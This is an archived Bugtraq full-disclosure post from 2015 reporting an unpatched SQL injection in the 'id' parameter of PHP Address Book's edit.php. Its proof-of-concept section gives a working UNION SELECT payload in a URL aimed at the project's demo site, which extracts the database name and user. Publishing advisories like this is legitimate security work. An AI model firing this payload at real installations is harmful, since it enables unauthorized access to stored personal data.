lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <56470031.2000503@gmail.com>
Date: Sat, 14 Nov 2015 15:04:41 +0530
From: Rahul Pratap Singh <techno.rps@...il.com>
To: bugtraq@...urityfocus.com
Subject: PHP Address Book SQL Injection Vulnerability

## Full Disclosure

#Exploit Title      : PHP Address Book SQL Injection Vulnerability
#Exploit Author     : Rahul Pratap Singh
#Date               : 14/Nov/2015
#Home Page Link     : http://sourceforge.net/projects/php-addressbook/
#Blog Url           : 0x62626262.wordpress.com
#Linkedin           : https://in.linkedin.com/in/rahulpratapsingh94
#Status             : Not Patched

1. Description

"id" field in edit.php is not properly sanitized, that leads to SQL
Injection Vulnerability.

2. Proof of Concept

http://php-addressbook.sourceforge.net/demo/edit.php?id=null' union
select
1,2,concat(0x3c2f7469746c653e,database(),0x3a,user(),0x3c62723e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--+

## Vendor Response

No reply from vendor


Download attachment "signature.asc" of type "application/pgp-signature" (837 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ